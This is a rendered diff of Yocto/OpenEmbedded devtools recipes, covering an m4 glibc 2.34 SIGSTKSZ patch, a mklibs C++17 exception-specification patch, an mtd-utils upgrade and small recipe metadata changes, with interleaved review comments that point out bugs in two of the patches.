34 file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \ 34 file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
35 file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \ 35 file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
36 file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \ 36 file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
diff --git a/meta/recipes-devtools/m4/m4-1.4.18.inc b/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6..6475b02f8b 100644
--- a/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
9SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \ 9SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
10 file://ac_config_links.patch \ 10 file://ac_config_links.patch \
11 file://m4-1.4.18-glibc-change-work-around.patch \ 11 file://m4-1.4.18-glibc-change-work-around.patch \
12 file://0001-c-stack-stop-using-SIGSTKSZ.patch \
12 " 13 "
13SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ 14SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
14 file://run-ptest \ 15 file://run-ptest \
diff --git a/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 0000000000..883b8a2075
--- /dev/null
+++ b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
1From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
2From: Khem Raj <raj.khem@gmail.com>
3Date: Fri, 30 Apr 2021 17:40:36 -0700
4Subject: [PATCH] c-stack: stop using SIGSTKSZ
5
6This patch is required with glibc 2.34+
7based on gnulib [1]
8
9[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
10
11Upstream-Status: Pending
12Signed-off-by: Khem Raj <raj.khem@gmail.com>
13---
14 lib/c-stack.c | 22 +++++++++++++---------
15 1 file changed, 13 insertions(+), 9 deletions(-)
16
17diff --git a/lib/c-stack.c b/lib/c-stack.c
18index 5353c08..863f764 100644
19--- a/lib/c-stack.c
20+++ b/lib/c-stack.c
21@@ -51,13 +51,14 @@
22 typedef struct sigaltstack stack_t;
23 #endif
24 #ifndef SIGSTKSZ
25-# define SIGSTKSZ 16384
26-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
27+#define get_sigstksz() (16384)
28+#elif HAVE_LIBSIGSEGV
29 /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
30 more than the Linux default of an 8k alternate stack when deciding
31 if a fault was caused by stack overflow. */
32-# undef SIGSTKSZ
33-# define SIGSTKSZ 16384
34+#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
35+#else
36+#define get_sigstksz() ((SIGSTKSZ))
37 #endif
38
39 #include <stdlib.h>
40@@ -131,7 +132,8 @@ die (int signo)
41 /* Storage for the alternate signal stack. */
42 static union
43 {
44- char buffer[SIGSTKSZ];
45+ /* allocate buffer with size from get_sigstksz() */
46+ char *buffer;
47
48 /* These other members are for proper alignment. There's no
49 standard way to guarantee stack alignment, but this seems enough
50@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
51 program_error_message = _("program error");
52 stack_overflow_message = _("stack overflow");
53
54+ alternate_signal_stack.buffer = malloc(get_sigstksz());
55 /* Always install the overflow handler. */
56 if (stackoverflow_install_handler (overflow_handler,
57 alternate_signal_stack.buffer,
58- sizeof alternate_signal_stack.buffer))
59+ get_sigstksz()))
60 {
61 errno = ENOTSUP;
62 return -1;
63@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
64 stack_t st;
65 struct sigaction act;
66 st.ss_flags = 0;
67+ alternate_signal_stack.buffer = malloc(get_sigstksz());
68 # if SIGALTSTACK_SS_REVERSED
69 /* Irix mistakenly treats ss_sp as the upper bound, rather than
70 lower bound, of the alternate stack. */
71- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
72- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
73+ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
74+ st.ss_size = get_sigstksz() - sizeof (void *);
75 # else
76 st.ss_sp = alternate_signal_stack.buffer;
77- st.ss_size = sizeof alternate_signal_stack.buffer;
78+ st.ss_size = get_sigstksz();
79 # endif
80 r = sigaltstack (&st, NULL);
81 if (r != 0)
82--
832.31.1
84
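Review bot: Both `alternate_signal_stack.buffer = malloc(get_sigstksz());` calls added to `c_stack_action()` use the result unchecked, so an allocation failure hands a NULL stack pointer to `stackoverflow_install_handler()` or `sigaltstack()`. Each site should bail out first, e.g. `if (!alternate_signal_stack.buffer) { errno = ENOMEM; return -1; }`. The buffer is also allocated afresh on every call and never freed, so a second call to `c_stack_action()` would appear to leak the previous stack; allocating only while the pointer is still NULL avoids that. `buffer` remains a member of the union whose other members exist "for proper alignment", which no longer does anything once the storage comes from `malloc()`, and a comment saying so would help. `c_stack_action()` is only partly visible in these hunks.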
diff --git a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
index 92d5870f42..5910f4bc70 100644
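--- a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
+++ b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Tool for creating device nodes"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
 SECTION = "base"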
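--- /dev/null
+++ b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
@@ -0,0 +1,431 @@
+From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Mon, 23 Aug 2021 12:45:11 +0200
+Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for
+ C++ 17
+
+Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2]
+
+based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+---
+ src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++---------------------
+ src/mklibs-readelf/elf.hpp | 18 ++++++++--------
+ src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++----------------
+ 3 files changed, 51 insertions(+), 51 deletions(-)
+
+diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp
+index 0e4c0f3..2e6d0f6 100644
+--- a/src/mklibs-readelf/elf.cpp
++++ b/src/mklibs-readelf/elf.cpp
+@@ -36,7 +36,7 @@ file::~file () throw ()
+ delete *it;
+ }
+
+-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error)
++file *file::open (const char *filename) throw ()
+ {
+ struct stat buf;
+ int fd;
+@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro
+ }
+
+ template<typename _class>
+-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file *file::open_class(uint8_t *mem, size_t len) throw ()
+ {
+ switch (mem[EI_DATA])
+ {
+@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run
+ }
+
+ template <typename _class, typename _data>
+-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw ()
+ : file(mem, len)
+ {
+ if (mem[EI_CLASS] != _class::id)
+@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc)
++void section_data<_class, _data>::update(const file &file) throw ()
+ {
+ const section_type<section_type_STRTAB> &section =
+ dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx()));
+@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNAMIC)
+@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNSYM)
+@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update (file);
+
+@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_GNU_verdef)
+@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header,
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERNEED>::
+-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_verneed)
+@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERSYM>::
+-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real (Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_versym)
+@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc)
++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw ()
+ : segment_data<_class, _data> (header, mem)
+ {
+ if (this->type != PT_INTERP)
+@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ if (is_string)
+ val_string = section.get_string(val);
+ }
+
+-std::string symbol::get_version () const throw (std::bad_alloc)
++std::string symbol::get_version () const throw ()
+ {
+ if (verneed)
+ return verneed->get_name();
+@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc)
+ return "Base";
+ }
+
+-std::string symbol::get_version_file () const throw (std::bad_alloc)
++std::string symbol::get_version_file () const throw ()
+ {
+ if (verneed)
+ return verneed->get_file();
+@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc)
+ return "None";
+ }
+
+-std::string symbol::get_name_version () const throw (std::bad_alloc)
++std::string symbol::get_name_version () const throw ()
+ {
+ std::string ver;
+
+@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw ()
+ {
+ if (!file.get_section_GNU_VERSYM())
+ return;
+@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef)
+ }
+
+ template <typename _class, typename _data>
+-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it)
+ names_string.push_back(section.get_string(*it));
+ }
+
+-version_requirement::version_requirement() throw (std::bad_alloc)
++version_requirement::version_requirement() throw ()
+ : file_string("None")
+ { }
+
+@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern
+
+ template <typename _class, typename _data>
+ void version_requirement_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ file_string = section.get_string(file);
+
+@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed)
+
+ template <typename _class, typename _data>
+ void version_requirement_entry_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp
+index 70e61cd..afb0c9e 100644
+--- a/src/mklibs-readelf/elf.hpp
++++ b/src/mklibs-readelf/elf.hpp
+@@ -49,7 +49,7 @@ namespace Elf
+ const uint16_t get_shstrndx() const throw () { return shstrndx; }
+
+ const std::vector<section *> get_sections() const throw () { return sections; };
+- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); };
++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); };
+ const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; };
+ const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; };
+ const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; };
+@@ -59,13 +59,13 @@ namespace Elf
+ const std::vector<segment *> get_segments() const throw () { return segments; };
+ const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; };
+
+- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error);
++ static file *open(const char *filename) throw ();
+
+ protected:
+- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { }
++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { }
+
+ template<typename _class>
+- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error);
++ static file *open_class(uint8_t *, size_t) throw ();
+
+ uint16_t type;
+ uint16_t machine;
+@@ -128,7 +128,7 @@ namespace Elf
+ class section_type<section_type_STRTAB> : public virtual section
+ {
+ public:
+- std::string get_string(uint32_t offset) const throw (std::bad_alloc)
++ std::string get_string(uint32_t offset) const throw ()
+ {
+ return std::string(reinterpret_cast<const char *> (mem + offset));
+ }
+@@ -263,10 +263,10 @@ namespace Elf
+ uint8_t get_bind () const throw () { return bind; }
+ uint8_t get_type () const throw () { return type; }
+ const std::string &get_name_string() const throw () { return name_string; }
+- std::string get_version() const throw (std::bad_alloc);
+- std::string get_version_file() const throw (std::bad_alloc);
++ std::string get_version() const throw ();
++ std::string get_version_file() const throw ();
+ uint16_t get_version_data() const throw () { return versym; }
+- std::string get_name_version() const throw (std::bad_alloc);
++ std::string get_name_version() const throw ();
+
+ protected:
+ uint32_t name;
+@@ -305,7 +305,7 @@ namespace Elf
+ class version_requirement
+ {
+ public:
+- version_requirement() throw (std::bad_alloc);
++ version_requirement() throw ();
+ virtual ~version_requirement () throw () { }
+
+ const std::string &get_file() const throw () { return file_string; }
+diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp
+index 05effee..3871982 100644
+--- a/src/mklibs-readelf/elf_data.hpp
++++ b/src/mklibs-readelf/elf_data.hpp
+@@ -94,7 +94,7 @@ namespace Elf
+ class file_data : public file
+ {
+ public:
+- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error);
++ file_data(uint8_t *, size_t len) throw ();
+
+ const uint8_t get_class() const throw () { return _class::id; }
+ const uint8_t get_data() const throw () { return _data::id; }
+@@ -109,7 +109,7 @@ namespace Elf
+ public:
+ section_data(Shdr *, uint8_t *) throw ();
+
+- virtual void update(const file &) throw (std::bad_alloc);
++ virtual void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data, typename _type>
+@@ -133,9 +133,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -147,9 +147,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -161,9 +161,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -175,9 +175,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -189,7 +189,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -220,7 +220,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Phdr Phdr;
+
+ public:
+- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc);
++ segment_real (Phdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -232,7 +232,7 @@ namespace Elf
+ public:
+ dynamic_data (Dyn *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -244,8 +244,8 @@ namespace Elf
+ public:
+ symbol_data (Sym *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
+- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
++ virtual void update_version (const file &, uint16_t) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -257,7 +257,7 @@ namespace Elf
+
+ version_definition_data (Verdef *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -269,7 +269,7 @@ namespace Elf
+
+ version_requirement_data (Verneed *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -280,7 +280,7 @@ namespace Elf
+
+ version_requirement_entry_data (Vernaux *, const version_requirement &) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+ }
+
+--
+2.11.0
+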
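Review bot: Rewriting every dynamic exception specification to `throw ()` changes behaviour instead of only removing the construct C++17 dropped, because `throw ()` is a non-throwing specification and an exception that escapes such a function terminates the process rather than reaching the caller. In the elf.hpp part, `get_section` still returns `*sections.at(i)`, which throws std::out_of_range for a bad index, and `file::open`, `open_class` and `file_data` were declared to throw std::runtime_error; mklibs-readelf parses ELF files it did not produce, so a malformed or unexpected input would now abort the tool instead of being reported as an error. The specifications that named exception types should be removed outright, for example `const section &get_section(unsigned int i) const { return *sections.at(i); };` and `static file *open(const char *filename);`, keeping `throw ()` only where the original already had it. The function bodies are mostly outside the hunks, so which of them actually throw is inferred from the specifications the patch removes.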
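--- a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
+++ b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/
  file://avoid-failure-on-symbol-provided-by-application.patch \
  file://show-GNU-unique-symbols-as-provided-symbols.patch \
  file://fix_cross_compile.patch \
+ file://remove-deprecated-exception-specification-cpp17.patch \
 "
 
 SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc"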
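--- a/meta/recipes-devtools/mmc/mmc-utils_git.bb
+++ b/meta/recipes-devtools/mmc/mmc-utils_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Userspace tools for MMC/SD devices"
 HOMEPAGE = "http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d"
 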
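--- a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001
-From: Barry Grussling <barry@grussling.com>
-Date: Sun, 12 Jan 2020 12:33:32 -0800
-Subject: [PATCH] mtd-utils: Fix return value of ubiformat
-Organization: O.S. Systems Software LTDA.
-
-This changeset fixes a feature regression in ubiformat. Older versions of
-ubiformat, when invoked with a flash-image, would return 0 in the case no error
-was encountered. Upon upgrading to latest, it was discovered that ubiformat
-returned 255 even without encountering an error condition.
-
-This changeset corrects the above issue and causes ubiformat, when given an
-image file, to return 0 when no errors are detected.
-
-Tested by running through my loading scripts and verifying ubiformat returned
-0.
-
-Upstream-Status: Backport [2.1.2]
-
-Signed-off-by: Barry Grussling <barry@grussling.com>
-Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at>
-Signed-off-by: Otavio Salvador <otavio@ossystems.com.br>
----
- ubi-utils/ubiformat.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c
-index a90627c..5377b12 100644
---- a/ubi-utils/ubiformat.c
-+++ b/ubi-utils/ubiformat.c
-@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- struct ubi_vtbl_record *vtbl;
- int eb1 = -1, eb2 = -1;
- long long ec1 = -1, ec2 = -1;
-+ int ret = -1;
-
- write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1;
- write_size /= mtd->subpage_size;
-@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- if (!args.quiet && !args.verbose)
- printf("\n");
-
-- if (novtbl)
-+ if (novtbl) {
-+ ret = 0;
- goto out_free;
-+ }
-
- if (eb1 == -1 || eb2 == -1) {
- errmsg("no eraseblocks for volume table");
-@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
-
- out_free:
- free(hdr);
-- return -1;
-+ return ret;
- }
-
- int main(int argc, char * const argv[])
---
-2.27.0
-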
diff --git a/meta/recipes-devtools/mtd/mtd-utils_git.bb b/meta/recipes-devtools/mtd/mtd-utils_git.bb
index 67cd8582b5..fa42770ee4 100644
--- a/meta/recipes-devtools/mtd/mtd-utils_git.bb
+++ b/meta/recipes-devtools/mtd/mtd-utils_git.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Tools for managing memory technology devices" 1SUMMARY = "Tools for managing memory technology devices"
2HOMEPAGE = "http://www.linux-mtd.infradead.org/" 2HOMEPAGE = "http://www.linux-mtd.infradead.org/"
3DESCRIPTION = "mtd-utils tool is a generic Linux subsystem for memory devices, especially Flash devices."
3SECTION = "base" 4SECTION = "base"
4LICENSE = "GPLv2+" 5LICENSE = "GPLv2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \ 6LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
@@ -10,18 +11,15 @@ inherit autotools pkgconfig update-alternatives
10DEPENDS = "zlib e2fsprogs util-linux" 11DEPENDS = "zlib e2fsprogs util-linux"
11RDEPENDS_mtd-utils-tests += "bash" 12RDEPENDS_mtd-utils-tests += "bash"
12 13
13PV = "2.1.1" 14PV = "2.1.3"
14 15
15SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a" 16SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5"
16SRC_URI = "git://git.infradead.org/mtd-utils.git \ 17SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \
17 file://add-exclusion-to-mkfs-jffs2-git-2.patch \ 18 file://add-exclusion-to-mkfs-jffs2-git-2.patch \
18 file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \ 19 "
19"
20 20
21S = "${WORKDIR}/git/" 21S = "${WORKDIR}/git/"
22 22
23EXTRA_OECONF += "--enable-install-tests"
24
25# xattr support creates an additional compile-time dependency on acl because 23# xattr support creates an additional compile-time dependency on acl because
26# the sys/acl.h header is needed. libacl is not needed and thus enabling xattr 24# the sys/acl.h header is needed. libacl is not needed and thus enabling xattr
27# regardless whether acl is enabled or disabled in the distro should be okay. 25# regardless whether acl is enabled or disabled in the distro should be okay.
diff --git a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
index f788e0fd43..9f4c8dc0bd 100644
--- a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
+++ b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
@@ -1,4 +1,4 @@
1From bb4e42ad3a0cdd23a1d1797e6299c76b474867c0 Mon Sep 17 00:00:00 2001 1From 81d6519499dcfebe7d21e65e002a8885a4e8d852 Mon Sep 17 00:00:00 2001
2From: Joshua Watt <JPEWhacker@gmail.com> 2From: Joshua Watt <JPEWhacker@gmail.com>
3Date: Tue, 19 Nov 2019 13:12:17 -0600 3Date: Tue, 19 Nov 2019 13:12:17 -0600
4Subject: [PATCH] Add --debug-prefix-map option 4Subject: [PATCH] Add --debug-prefix-map option
@@ -11,7 +11,7 @@ Upstream-Status: Submitted [https://bugzilla.nasm.us/show_bug.cgi?id=3392635]
11Signed-off-by: Joshua Watt <JPEWhacker@gmail.com> 11Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
12 12
13--- 13---
